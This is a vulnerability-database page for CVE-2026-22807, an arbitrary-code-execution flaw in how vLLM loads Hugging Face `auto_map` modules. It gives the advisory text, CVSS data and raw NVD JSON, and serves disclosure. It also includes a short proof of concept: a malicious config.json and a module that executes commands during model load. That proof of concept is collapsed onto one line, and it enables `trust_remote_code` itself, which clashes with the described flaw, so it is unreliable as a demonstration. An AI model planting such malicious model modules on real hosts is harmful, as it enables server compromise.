Security Vulnerability Report
中文
CVE-2026-22807 CVSS 8.8 HIGH

CVE-2026-22807

Published: 2026-01-21 22:15:49
Last Modified: 2026-01-30 14:43:22
Source: [email protected]

Description

vLLM is an inference and serving engine for large language models (LLMs). Starting in version 0.10.1 and prior to version 0.14.0, vLLM loads Hugging Face `auto_map` dynamic modules during model resolution without gating on `trust_remote_code`, allowing attacker-controlled Python code in a model repo/path to execute at server startup. An attacker who can influence the model repo/path (local directory or remote Hugging Face repo) can achieve arbitrary code execution on the vLLM host during model load. This happens before any request handling and does not require API access. Version 0.14.0 fixes the issue.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:* - VULNERABLE
vLLM 0.10.1 <= version < 0.14.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Malicious model config.json for CVE-2026-22807 PoC # Place this config.json in a Hugging Face model repo or local directory { "model_type": "custom_model", "auto_map": { "AutoConfig": ["malicious_module.MaliciousConfig", "None"] }, "trust_remote_code": true } # malicious_module.py - Malicious code to be placed alongside config.json ''' import os import subprocess class MaliciousConfig: def __init__(self, *args, **kwargs): # Arbitrary code execution during model loading # Example: Create a backdoor or exfiltrate data try: with open('/tmp/vllm_pwned.txt', 'w') as f: f.write('CVE-2026-22807 exploited successfully') # Execute system commands as vLLM user subprocess.run(['id'], capture_output=True) except Exception as e: pass super().__init__(*args, **kwargs) ''' # Exploitation scenario: # 1. Attacker creates a malicious model repo on Hugging Face Hub # 2. Victim runs: vllm serve attacker/model --trust-remote-code # 3. Or victim loads model from a path controlled by attacker # 4. Code executes during model loading, before any API request

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22807", "sourceIdentifier": "[email protected]", "published": "2026-01-21T22:15:49.077", "lastModified": "2026-01-30T14:43:22.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vLLM is an inference and serving engine for large language models (LLMs). Starting in version 0.10.1 and prior to version 0.14.0, vLLM loads Hugging Face `auto_map` dynamic modules during model resolution without gating on `trust_remote_code`, allowing attacker-controlled Python code in a model repo/path to execute at server startup. An attacker who can influence the model repo/path (local directory or remote Hugging Face repo) can achieve arbitrary code execution on the vLLM host during model load. This happens before any request handling and does not require API access. Version 0.14.0 fixes the issue."}, {"lang": "es", "value": "vLLM es un motor de inferencia y servicio para modelos de lenguaje grandes (LLM). A partir de la versión 0.10.1 y antes de la versión 0.14.0, vLLM carga módulos dinámicos 'auto_map' de Hugging Face durante la resolución del modelo sin depender de 'trust_remote_code', permitiendo que código Python controlado por el atacante en un repositorio/ruta de modelo se ejecute al inicio del servidor. Un atacante que pueda influir en el repositorio/ruta del modelo (directorio local o repositorio remoto de Hugging Face) puede lograr la ejecución de código arbitrario en el host de vLLM durante la carga del modelo. Esto ocurre antes de cualquier manejo de solicitudes y no requiere acceso a la API. La versión 0.14.0 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.10.1", "versionEndExcluding": "0.14.0", "matchCriteriaId": "F2E87BA6-DDF8-4FF6-A286-B44780082C69"}]}]}], "references": [{"url": "https://github.com/vllm-project/vllm/commit/78d13ea9de4b1ce5e4d8a5af9738fea71fb024e5", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vllm-project/vllm/pull/32194", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/vllm-project/vllm/releases/tag/v0.14.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-2pc9-4j83-qjmr", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.